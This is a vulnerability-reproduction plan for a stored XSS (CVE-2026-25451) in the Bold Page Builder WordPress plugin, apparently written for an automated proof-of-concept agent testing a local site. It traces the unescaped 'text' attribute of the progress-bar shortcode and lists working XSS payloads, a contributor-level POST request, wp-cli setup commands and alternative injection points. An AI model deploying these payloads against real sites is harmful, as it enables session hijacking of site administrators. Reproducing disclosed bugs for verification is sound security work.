Research Plan: CVE-2026-25451 Bold Page Builder Stored XSS

1. Vulnerability Summary

The Bold Page Builder plugin (versions <= 5.6.9) is vulnerable to Authenticated Stored Cross-Site Scripting (XSS). The vulnerability exists within the rendering of the bt_bb_progress_bar content element. Specifically, the text attribute of the [bt_bb_progress_bar] shortcode is output to the page without proper sanitization or escaping, allowing users with at least Contributor-level permissions to inject arbitrary JavaScript.

2. Attack Vector Analysis

• Endpoint: WordPress Post Editor (/wp-admin/post-new.php or /wp-admin/post.php) or the Bold Builder Frontend Editor.
• Vulnerable Attribute: The text parameter of the bt_bb_progress_bar element.
• Authentication Level: Contributor+. Contributors can create posts and insert shortcodes, although they cannot publish them. The XSS will execute when an Editor or Admin previews or views the draft.
• Preconditions: The Bold Page Builder plugin must be active.

3. Code Flow

1. Entry Point: A user with Contributor permissions creates a post containing the following shortcode:
   [bt_bb_progress_bar text="<script>alert(document.domain)</script>"]
2. Shortcode Registration: The plugin registers content elements. In content_elements/bt_bb_progress_bar/bt_bb_progress_bar.php, the class bt_bb_progress_bar extends BT_BB_Element.
3. Shortcode Handling: When the page is viewed, the handle_shortcode function is called (Line 5).
4. Attribute Extraction: The attributes are extracted using shortcode_atts (Lines 7-15). The $text variable receives the malicious payload.
5. Vulnerable Sink: At line 105, the $output string is constructed:

   $output .= '<div' . $id_attr . ' class="' . esc_attr( implode( ' ', $class ) ) . '"' . $style_attr . ' data-bt-override-class="' . htmlspecialchars( json_encode( $data_override_class, JSON_FORCE_OBJECT ), ENT_QUOTES, 'UTF-8' ) . '"><div class="bt_bb_progress_bar_bg"></div><div class="bt_bb_progress_bar_inner animate" style="width:' . esc_attr( intval( $percentage ) ) . '%"><span class="bt_bb_progress_bar_text">' . $text . '</span></div></div>';
   

6. Failure to Escape: While other variables like $percentage are cast to intval and $class is passed through esc_attr, the $text variable is appended directly to the HTML inside a <span> tag without calling esc_html() or wp_kses().
7. Execution: The browser renders the <span> and executes the script.

4. Nonce Acquisition Strategy

This vulnerability can be exploited by simply saving a post via the standard WordPress REST API or the Classic/Gutenberg editor. However, if the PoC agent utilizes the Bold Builder Frontend Editor, a nonce will be required.

1. Shortcode Identification: The bt_bb_progress_bar element is the target.
2. Page Creation:
   wp post create --post_type=page --post_status=publish --post_title="XSS Test" --post_content="[bt_bb_progress_bar text='init']"
3. Extraction:
   • Navigate to the newly created page.
   • The plugin localizes scripts for the editor. Based on common BoldThemes patterns (inferred from bold-builder.php truncated logic), look for the bt_bb_settings or bt_bb_fe_data object.
   • Use browser_eval: window.bt_bb_settings?.nonce or check the bt_bb_fe_save button's data attributes.

Note: For a simple Stored XSS PoC, using wp-cli to create the post or the standard WordPress admin UI is the most reliable path and avoids complex frontend nonce requirements.

5. Exploitation Strategy

1. Authenticate: Log in as a Contributor user.
2. Create Post: Send a request to /wp-admin/post.php to save a new draft containing the payload.
3. Payload:
   [bt_bb_progress_bar text="<img src=x onerror=alert(window.origin)>" percentage="50"]
4. HTTP Request:
   • Method: POST
   • URL: http://localhost:8080/wp-admin/post.php
   • Body (URL-encoded):
     • post_title: XSS Vulnerability Test
     • content: [bt_bb_progress_bar text="<img src=x onerror=alert(window.origin)>" percentage="50"]
     • action: editpost
     • post_type: post
     • _wpnonce: (Acquire from /wp-admin/post-new.php)
5. Trigger: Navigate to the post URL (or preview URL as Admin) using browser_navigate.

6. Test Data Setup

1. User: Create a contributor user.
   wp user create attacker attacker@example.com --role=contributor --user_pass=password123
2. Plugin: Ensure bold-page-builder is active.
   wp plugin activate bold-page-builder

7. Expected Results

• When the page containing the shortcode is rendered, the HTML source should contain:
  <span class="bt_bb_progress_bar_text"><img src=x onerror=alert(window.origin)></span>
• The browser_eval of alert should be triggered, or the agent should detect the unescaped tags in the DOM.

8. Verification Steps

1. Database Check: Verify the shortcode is stored correctly in the wp_posts table.
   wp db query "SELECT post_content FROM wp_posts WHERE post_title='XSS Vulnerability Test'"
2. Output Check: Use http_request to GET the post frontend and grep for the raw payload.
   http_request('GET', 'http://localhost:8080/?p=[POST_ID]')
   Check if the response body contains the raw <img src=x...> inside the bt_bb_progress_bar_text span.

9. Alternative Approaches

• Attribute Breakout: If the text attribute was inside an HTML attribute, we would use quotes to break out (e.g., text='"><script>...'). Since it is in a <span> body, the direct tag injection used above is sufficient.
• Other Elements: If bt_bb_progress_bar is patched, check bt_bb_headline or bt_bb_button as they often follow similar unescaped patterns in the same plugin suite.
• Frontend Editor Bypass: If wp-admin is restricted, use the frontend builder by capturing the bt_bb_fe_save AJAX request, which typically sends the entire post content in a content parameter to admin-ajax.php.